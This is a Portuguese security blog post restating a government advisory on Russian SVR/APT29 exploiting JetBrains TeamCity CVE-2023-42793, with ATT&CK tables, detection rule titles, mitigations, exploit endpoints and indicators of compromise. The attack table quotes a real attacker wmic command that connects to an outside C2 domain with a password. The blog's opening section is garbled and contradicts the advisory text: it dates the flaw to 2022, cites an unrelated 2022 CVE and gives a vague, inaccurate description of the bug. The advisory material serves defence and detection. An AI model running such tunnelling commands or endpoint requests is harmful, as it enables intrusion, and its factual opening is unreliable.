O Serviço Russo de Inteligência Estrangeira (SVR), também conhecidos como Advanced Persistent Threat 29 (APT 29), Dukes, CozyBear e NOBELIUM/Midnight Blizzard – estão explorando CVE-2023-42793, uma ferramenta de integração contínua e entrega contínua (CI/CD). A vulnerabilidade, que foi relatada pela primeira vez em 2022, permite que os atacantes executem código arbitrário nos sistemas afetados.
A CISA (Agência de Segurança Cibernética e Infraestrutura dos EUA) emitiu um alerta de segurança em 13 de dezembro de 2023, alertando as organizações sobre a exploração da vulnerabilidade pelo SVR. O alerta recomenda que as organizações que usam o JetBrains TeamCity apliquem o patch de segurança o mais rápido possível.
O JetBrains TeamCity é uma ferramenta de CI/CD popular usada por organizações em todo o mundo. A ferramenta permite que as organizações automatizem o processo de desenvolvimento, construção e teste de software.
Em 2022, a JetBrains publicou um aviso de segurança sobre uma vulnerabilidade crítica no JetBrains TeamCity. A vulnerabilidade, identificada como CVE-2022-22941, permite que os atacantes executem código arbitrário nos sistemas afetados.
Descrição da Vulnerabilidade
A vulnerabilidade está presente na funcionalidade de gerenciamento de usuários do JetBrains TeamCity. A vulnerabilidade permite que os atacantes injetem código malicioso em um arquivo de configuração do TeamCity.
Quando o arquivo de configuração é carregado pelo TeamCity, o código malicioso é executado no sistema afetado. O código malicioso pode ser usado para:
- Obter acesso administrativo ao sistema
- Instalar malware
- Roubar dados
- Causar danos ao sistema
Impacto dos Ataques
A CISA acredita que o SVR está explorando a vulnerabilidade do JetBrains TeamCity para atacar organizações em todo o mundo. A agência não divulgou detalhes sobre os ataques, mas disse que os atacantes estão mirando organizações em setores críticos, como defesa, governo e infraestrutura crítica.
Recomendações de Segurança do IDCiber.org
O IDCIber recomenda que as organizações que usam o JetBrains TeamCity apliquem o patch de segurança o mais rápido possível. O patch está disponível no site da JetBrains.
Além de aplicar o patch de segurança, as organizações também devem tomar as seguintes medidas para se protegerem de ataques:
- Mantenha seu software antivírus atualizado.
- Seja cauteloso ao abrir documentos de isca.
- Não clique em links de fontes desconhecidas.
- Educar seus funcionários sobre segurança cibernética.
Os APT29, Dukes, CozyBear e NOBELIUM/Midnight Blizzard são grupos de hackers patrocinados por estados que estão ativos há muitos anos e são conhecidos por seus ataques sofisticados a organizações em todo o mundo. Esses grupos são particularmente eficazes porque são capazes de se adaptar rapidamente às mudanças nas defesas cibernéticas.
Embora não haja uma solução única para se proteger contra esses grupos, existem uma série de medidas de segurança que as organizações podem implementar para reduzir o risco de serem atacadas.
1. Implemente uma postura de segurança cibernética sólida
A base de qualquer defesa cibernética eficaz é uma postura de segurança sólida. Isso inclui medidas como:
- Atualize seu software e patches de segurança com frequência
- Use firewalls e outros dispositivos de segurança de rede
- Implemente autenticação multifator (MFA)
- Educar seus funcionários sobre segurança cibernética
2. Seja proativo na detecção e resposta a ameaças
Além de implementar uma postura de segurança sólida, as organizações também devem ser proativas na detecção e resposta a ameaças. Isso inclui medidas como:
- Monitoramento contínuo de seus sistemas para atividades suspeitas
- Uso de ferramentas de detecção e resposta a incidentes (SIEM e SOAR)
- Ter um plano de resposta a incidentes em vigor
3. Implemente proteção contra ataques de phishing e malware
Os ataques de phishing e malware são duas das técnicas mais comuns usadas pelos grupos de APT. As organizações podem se proteger contra esses ataques implementando medidas como:
- Uso de filtros de spam e antivírus
- Educar seus funcionários sobre como identificar e evitar ataques de phishing
- Uso de soluções de segurança de e-mail abrangentes
4. Proteja suas informações confidenciais
As informações confidenciais, como dados financeiros ou de propriedade intelectual, são um alvo principal para os grupos de APT. As organizações podem proteger essas informações implementando medidas como:
- Uso de criptografia
- Implementação de políticas de controle de acesso
- Revisão periódica de seus processos de segurança
Recomendações de Segurança da CISA
TÁTICAS E TÉCNICAS DE MITRE ATT&CK
Veja as tabelas abaixo para todas as táticas e técnicas dos agentes de ameaças referenciadas neste comunicado. Para mitigações adicionais, consulte a seção Mitigações.
Título da Técnica | EU IA | Usar |
---|---|---|
Reúna informações da rede da vítima: topologia da rede | T1590.004 | Os ciberatores do SVR podem coletar informações sobre a topologia de rede da vítima que podem ser usadas durante o direcionamento. |
Reúna informações do anfitrião da vítima: software | T1592.002 | Os ciberatores do SVR podem coletar informações sobre as redes hospedeiras da vítima que podem ser usadas durante a segmentação. |
Título da Técnica | EU IA | Usar |
---|---|---|
Explorar aplicativos voltados ao público | T1190 | Os ciberatores SVR exploram o servidor JetBrains TeamCity conectado à Internet usando CVE-2023-42793 para acesso inicial. |
Título da Técnica | EU IA | Usar |
---|---|---|
Intérprete de comandos e scripts: PowerShell | T1059.001 | Os ciberatores do SVR usaram comandos do PowerShell para compactar arquivos .dll do servidor Microsoft SQL. |
Intérprete de comandos e scripts: Windows Command Shell | T1059.003 | Os ciberatores SVR executam estes comandos do PowerShell para realizar o reconhecimento do host:
|
Exploração para execução do cliente | T1203 | Os ciberatores SVR aproveitam a execução arbitrária de código após explorar CVE-2023-42793. |
Fluxo de execução de hijack: carregamento lateral de DLL | T1574.002 | Os ciberatores SVR usam uma variante do GraphicalProton que usa o sequestro de DLL no Zabbix como meio de iniciar a execução. |
Título da Técnica | EU IA | Usar |
---|---|---|
Tarefa agendada | T1053.005 | Os ciberatores do SVR podem abusar do Agendamento de Tarefas do Windows para realizar o agendamento de tarefas para execução inicial ou recorrente de código malicioso. |
Componente de software de servidor: procedimentos armazenados SQL | T1505.001 | Os ciberatores SVR abusam dos procedimentos armazenados do SQL Server para manter a persistência. |
Execução de inicialização automática de inicialização ou logon | T1547 | Os ciberatores do SVR usaram C:\Windows\system32\ntoskrnl.exe para definir as configurações de inicialização automática do sistema para manter a persistência. |
Título da Técnica | EU IA | Usar |
---|---|---|
Exploração para escalonamento de privilégios | T1068 | Os ciberatores SVR exploram a vulnerabilidade do JetBrains TeamCity para obter privilégios escalonados.
Para evitar a detecção, os ciberatores do SVR usaram a técnica “Traga seu próprio driver vulnerável” para desativar os mecanismos de defesa EDR e AV. |
Manipulação de conta | T1098 | Os ciberatores do SVR podem manipular contas para manter e/ou elevar o acesso aos sistemas das vítimas. |
Título da Técnica | EU IA | Usar |
---|---|---|
Arquivos ou informações ofuscadas: preenchimento binário | T1027.001 | Os ciberatores SVR usam BMPs para realizar preenchimento binário enquanto os dados de troca são exfiltrados para sua estação C2. |
Mascaramento | T1036 | Os ciberatores SVR usam uma variante que usa o sequestro de DLL no Zabbix como um meio de iniciar a execução (e potencialmente fornecer acesso de longo prazo e difícil de detectar) e uma variante que se mascara dentro do vcperf, uma ferramenta de análise de construção C++ de código aberto da Microsoft. |
Injeção de Processo | T1055 | Os ciberatores SVR injetam código nos processos AV e EDR para escapar das defesas. |
Desabilitar ou modificar ferramentas | T1562.001 | Os ciberatores do SVR podem modificar e/ou desabilitar ferramentas para evitar a possível detecção de seus malwares/ferramentas e atividades. |
Ocultar artefatos | T1564 | Os ciberatores do SVR podem tentar ocultar artefatos associados aos seus comportamentos para evitar a detecção. |
Ocultar artefatos: arquivos e diretórios ocultos | T1564.001 | Ao se comunicar com serviços em nuvem, o GraphicalProton gera um diretório nomeado aleatoriamente que é usado para armazenar arquivos BMP específicos de infecções – com comandos e resultados. |
Título da Técnica | EU IA | Usar |
---|---|---|
Despejo de credenciais do sistema operacional: memória LSASS | T1003.001 | Os ciberatores do SVR executaram comandos Mimikatz na memória para obter acesso às credenciais armazenadas na memória. |
Despejo de credenciais do sistema operacional: gerente de contas de segurança | T1003.002 | Atores cibernéticos SVR usaram:
Comandos Mimikatz para obter acesso às credenciais. Além disso, os ciberatores do SVR exfiltraram seções do registro do Windows para roubar credenciais.
|
Credenciais de armazenamentos de senhas: credenciais de navegadores da Web | T1555.003 | Em alguns casos específicos, o SVR usou a ferramenta SharpChromium para obter dados confidenciais do navegador, como cookies de sessão, histórico de navegação ou logins salvos. |
Roubar ou falsificar ingressos Kerberos: Bilhete Dourado | T1558.001 | Para garantir o acesso de longo prazo ao meio ambiente, o SVR usou o kit de ferramentas Rubeus para criar Ticket Granting Tickets (TGTs). |
Título da Técnica | EU IA | Usar |
---|---|---|
Proprietário do sistema/descoberta de usuário | T1033 | Os ciberatores SVR usam estes comandos integrados para realizar o reconhecimento de host: whoami /priv, whoami /all, whoami / groups, whoami /domain para realizar a descoberta do usuário. |
Descoberta de serviço de rede | T1046 | Os ciberatores SVR realizaram reconhecimento de rede usando uma combinação de comandos integrados e ferramentas adicionais, como scanner de porta e PowerSploit. |
Descoberta de processos | T1057 | Os ciberatores SVR usam GraphicalProton para coletar dados de processos em execução. |
Reúna informações da rede de vítimas | T1590 | Os ciberatores SVR usam GraphicalProton para coletar informações da rede das vítimas. |
Título da Técnica | EU IA | Usar |
---|---|---|
Exploração de serviços remotos | T1210 | Os ciberatores do SVR podem explorar serviços remotos para obter acesso não autorizado a sistemas internos, uma vez dentro de uma rede. |
Instrumentação de gerenciamento do Windows | T1047 | Os ciberatores do SVR executaram o Rsockstun na memória ou usando o Windows Management Instrumentation (WMI) para executar comandos e cargas maliciosas.
wmic process call create “C:\Arquivos de programas\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31” |
Título da Técnica | EU IA | Usar |
---|---|---|
Resolução Dinâmica | T1568 | O SVR pode estabelecer conexões dinamicamente com a infraestrutura de comando e controle para evitar detecções e correções comuns. |
Tunelamento de protocolo | T1572 | Os atores cibernéticos do SVR podem encapsular as comunicações de rede de e para o sistema da vítima dentro de um protocolo separado para evitar a detecção/filtragem da rede e/ou permitir o acesso a sistemas que de outra forma seriam inacessíveis.
Em ambientes selecionados, o SVR usou uma ferramenta adicional chamada “rr.exe” – um túnel de meias reversas de código aberto modificado chamado Rsockstunm – para estabelecer um túnel para a infraestrutura C2. |
Título da Técnica | EU IA | Usar |
---|---|---|
Exfiltração Automatizada | T1020 | Os ciberatores do SVR podem exfiltrar dados, como documentos confidenciais, por meio do uso de processamento automatizado após serem coletados durante a coleta. |
Exfiltração pelo canal C2 | T1041 | Os ciberatores SVR podem roubar dados exfiltrando-os através de um canal C2 existente. Os dados roubados são codificados nas comunicações normais usando o mesmo protocolo das comunicações C2. |
Exfiltração por serviço da Web | T1567 | Os ciberatores SVR usam OneDrive e Dropbox para exfiltrar dados para sua estação C2. |
INDICADORES DE COMPROMISSO
Nota: Consulte o Apêndice B para obter uma lista de IOCs.
TIPOS DE VÍTIMAS
Como resultado desta última atividade cibernética do SVR, o FBI, CISA, NSA, SKW, CERT Polska e NCSC identificaram algumas dezenas de empresas comprometidas nos Estados Unidos, Europa, Ásia e Austrália, e estão cientes de mais de cem dispositivos comprometidos, embora avaliemos, esta lista não representa o conjunto completo de organizações comprometidas. Geralmente, os tipos de vítimas não se enquadram em nenhum tipo de padrão ou tendência, além de terem um servidor JetBrains TeamCity acessível pela Internet, sem patch, levando à avaliação de que a exploração das redes dessas vítimas pelo SVR era de natureza oportunista e não necessariamente direcionada. ataque. As vítimas identificadas incluíram: uma associação comercial de energia; empresas que fornecem software para cobrança, dispositivos médicos, atendimento ao cliente, monitoramento de funcionários, gestão financeira, marketing, vendas e videogames; bem como empresas de hospedagem, fabricantes de ferramentas e pequenas e grandes empresas de TI.
MÉTODOS DE DETECÇÃO
As regras a seguir podem ser usadas para detectar atividades vinculadas à atividade adversária. Estas regras devem servir de exemplo e adaptar-se ao ambiente e à telemetria de cada organização.
Regras SIGMA
title: Privilege information listing via whoami title: DC listing via nltest title: DLL execution via WMI title: Process with connect and pass as args title: Service or Drive enumeration via powershell
|
Regras YARA
A regra a seguir detecta as variantes GraphicalProton mais conhecidas.
rule APT29_GraphicalProton { // 48 05 20 00 00 00 add rax, 20h ; ' ' condition: |
Observação: essas regras destinam-se à caça de ameaças e não foram testadas em um conjunto de dados maior.
MITIGAÇÕES
O FBI, CISA, NSA, SKW, CERT Polska e NCSC avaliam o alcance e o direcionamento indiscriminado desta campanha representa uma ameaça à segurança pública e recomendam que as organizações implementem as mitigações abaixo para melhorar a postura de segurança cibernética da organização. Essas mitigações estão alinhadas com as Metas de Desempenho de Segurança Cibernética (CPGs) intersetoriais desenvolvidas pela CISA e pelo Instituto Nacional de Padrões e Tecnologia (NIST). Os CPGs fornecem um conjunto mínimo de práticas e proteções que a CISA e o NIST recomendam que todas as organizações implementem. A CISA e o NIST basearam os CPGs em estruturas e orientações de segurança cibernética existentes para proteção contra as ameaças, táticas, técnicas e procedimentos mais comuns e impactantes. Visite as Metas de desempenho de segurança cibernética intersetorial da CISA para obter mais informações sobre os CPGs, incluindo proteções básicas adicionais recomendadas.
- Aplique os patches disponíveis para CVE-2023-42793 emitidos pela JetBrains TeamCity em meados de setembro de 2023, se ainda não tiver sido concluído.
- Monitore a rede em busca de evidências de comandos codificados e execução de ferramentas de varredura de rede.
- Certifique-se de que as soluções de monitoramento antivírus/endpoint baseadas em host estejam habilitadas e configuradas para alertar se o monitoramento ou a geração de relatórios forem desabilitados ou se a comunicação for perdida com um agente de host por mais do que um período de tempo razoável.
- Exigir o uso de autenticação multifator [ CPG 1.3 ] para todos os serviços, na medida do possível, especialmente para e-mail, redes privadas virtuais e contas que acessam sistemas críticos.
- As organizações devem adotar a autenticação multifator (MFA) como uma camada adicional de segurança para todos os usuários com acesso a dados confidenciais. A ativação da MFA reduz significativamente o risco de acesso não autorizado, mesmo que as senhas sejam comprometidas.
- Mantenha todos os sistemas operacionais, software e firmware atualizados. Configure imediatamente sistemas recém-adicionados à rede, incluindo aqueles usados para testes ou trabalhos de desenvolvimento, para seguir a linha de base de segurança da organização e incorporá-los às ferramentas de monitoramento corporativo.
- Arquivos de log de auditoria para identificar tentativas de acesso a certificados privilegiados e criação de provedores de identidade falsos.
- Implante software para identificar comportamentos suspeitos nos sistemas.
- Implante sistemas de proteção de endpoint com a capacidade de monitorar indicadores comportamentais de comprometimento.
- Use os recursos públicos disponíveis para identificar abuso de credenciais em ambientes de nuvem.
- Configure mecanismos de autenticação para confirmar determinadas atividades do usuário nos sistemas, incluindo o registro de novos dispositivos.
VALIDAR CONTROLES DE SEGURANÇA
Além de aplicar mitigações, FBI, CISA, NSA, SKW, CERT Polska e NCSC recomendam exercitar, testar e validar o programa de segurança da sua organização contra os comportamentos de ameaça mapeados para a estrutura MITRE ATT&CK for Enterprise neste comunicado. FBI, CISA, NSA, SKW, CERT Polska e NCSC recomendam testar seu inventário de controles de segurança existente para avaliar seu desempenho em relação às técnicas ATT&CK descritas neste comunicado.
Para começar:
- Selecione uma técnica ATT&CK descrita neste comunicado (consulte as tabelas anteriores).
- Alinhe suas tecnologias de segurança com a técnica.
- Teste suas tecnologias em relação à técnica.
- Analise o desempenho das suas tecnologias de detecção e prevenção.
- Repita o processo para todas as tecnologias de segurança para obter um conjunto abrangente de dados de desempenho.
- Ajuste seu programa de segurança, incluindo pessoas, processos e tecnologias, com base nos dados gerados por esse processo.
FBI, CISA, NSA, SKW, CERT Polska e NCSC recomendam testar continuamente seu programa de segurança, em escala, em um ambiente de produção para garantir o desempenho ideal em relação às técnicas MITRE ATT&CK identificadas neste comunicado.
APÊNDICE A – INDICADORES DE COMPROMISSO CVE-2023-42793
Em um sistema Windows, o arquivo de log C:\TeamCity\logs\teamcity-server.log
conterá uma mensagem de log quando um invasor modificar o internal.properties
arquivo. Haverá também uma mensagem de log para cada processo criado por meio do /app/rest/debug/processes
endpoint. Além de mostrar a linha de comando utilizada, também é mostrado o ID do usuário da conta do usuário cujo token de autenticação foi utilizado durante o ataque. Por exemplo:
[2023-09-26 11:53:46,970] INFO - ntrollers.FileBrowseController - File edited: C:\ProgramData\JetBrains\TeamCity\config\internal.properties by user with id=1
[2023-09-26 11:53:46,970] INFO - s.buildServer.ACTIVITIES.AUDIT - server_file_change: File C:\ProgramData\JetBrains\TeamCity\config\internal.properties was modified by "user with id=1"
[2023-09-26 11:53:58,227] INFO - tbrains.buildServer.ACTIVITIES - External process is launched by user user with id=1. Command line: cmd.exe "/c whoami"
Um invasor pode tentar encobrir seus rastros apagando esse arquivo de log. Não parece que o TeamCity registre solicitações HTTP individuais, mas se o TeamCity estiver configurado para ficar atrás de um proxy HTTP, o proxy HTTP pode ter logs adequados mostrando os seguintes endpoints de destino sendo acessados:
/app/rest/users/id:1/tokens/RPC2
– Este endpoint é necessário para explorar a vulnerabilidade./app/rest/users
– Este endpoint só é necessário se o invasor desejar criar um usuário arbitrário./app/rest/debug/processes
– Este endpoint só é necessário se o invasor desejar criar um processo arbitrário.
Nota: O valor do ID do usuário pode ser superior a 1.
APÊNDICE B – IOCS
IoCs de arquivo
Backdoor GraphicProton:
- 01B5F7094DE0B2C6F8E28AA9A2DED678C166D615530E595621E692A9C0240732
- 34C8F155601A3948DDB0D60B582CFE87DE970D443CC0E05DF48B1A1AD2E42B5E
- 620D2BF14FE345EEF618FDD1DAC242B3A0BB65CCB75699FE00F7C671F2C1D869
- 773F0102720AF2957859D6930CD09693824D87DB705B3303CEF9EE794375CE13
- 7B666B978DBBE7C032CEF19A90993E8E4922B743EE839632BFA6D99314EA6C53
- 8AFB71B7CE511B0BCE642F46D6FC5DD79FAD86A58223061B684313966EFEF9C7
- 971F0CED6C42DD2B6E3EA3E6C54D0081CF9B06E79A38C2EDE3A2C5228C27A6DC
- CB83E5CB264161C28DE76A44D0EDB450745E773D24BEC5869D85F69633E44DCF
- CD3584D61C2724F927553770924149BB51811742A461146B15B34A26C92CAD43
- EBE231C90FAD02590FC56D5840ACC63B90312B0E2FEE7DA3C7606027ED92600E
- F1B40E6E5A7CBC22F7A0BD34607B13E7E3493B8AAD7431C47F1366F0256E23EB
- C7B01242D2E15C3DA0F45B8ADEC4E6913E534849CDE16A2A6C480045E03FBEE4
- 4BF1915785D7C6E0987EB9C15857F7AC67DC365177A1707B14822131D43A6166
Porta traseira GraphicalProton HTTPS:
- 18101518EAE3EEC6EBE453DE4C4C380160774D7C3ED5C79E1813013AC1BB0B93
- 19F1EF66E449CF2A2B0283DBB756850CCA396114286E1485E35E6C672C9C3641
- 1E74CF0223D57FD846E171F4A58790280D4593DF1F23132044076560A5455FF8
- 219FB90D2E88A2197A9E08B0E7811E2E0BD23D59233287587CCC4642C2CF3D67
- 92C7693E82A90D08249EDEAFBCA6533FED81B62E9E056DEC34C24756E0A130A6
- B53E27C79EED8531B1E05827ACE2362603FB9F77F53CEE2E34940D570217CBF7
- C37C109171F32456BBE57B8676CC533091E387E6BA733FBAA01175C43CFB6EBD
- C40A8006A7B1F10B1B42FDD8D6D0F434BE503FB3400FB948AC9AB8DDFA5B78A0
- C832462C15C8041191F190F7A88D25089D57F78E97161C3003D68D0CC2C4BAA3
- F6194121E1540C3553273709127DFA1DAAB96B0ACFAB6E92548BFB4059913C69
vcperf backdoor:
- D724728344FCF3812A0664A80270F7B4980B82342449A8C5A2FA510E10600443
Arquivo de instalação backdoor do Zabbix:
- 4EE70128C70D646C5C2A9A17AD05949CB1FBF1043E9D671998812B2DCE75CF0F
Arquivo de instalação do Webroot AV backdoored:
- 950ADBAF66AB214DE837E6F1C00921C501746616A882EA8C42F1BAD5F9B6EFF4
RSockstun modificado
- CB83E5CB264161C28DE76A44D0EDB450745E773D24BEC5869D85F69633E44DCF
IoCs de rede
Pontos finais do túnel
- 65.20.97[.]203
- 65.21.51[.]58
Servidor de Exploração
- 103.76.128[.]34
URL GraphicalProton HTTPS C2:
hxxps://matclick[.]com/wp-query[.]php
Conclusão
A exploração do SVR da vulnerabilidade do JetBrains TeamCity é um lembrete de que as organizações devem estar cientes das ameaças cibernéticas e tomar medidas para se protegerem. As organizações devem aplicar patches de segurança rapidamente e implementar outras medidas de segurança para ajudar a proteger seus sistemas.
Descubra mais sobre DCiber
Assine para receber os posts mais recentes por e-mail.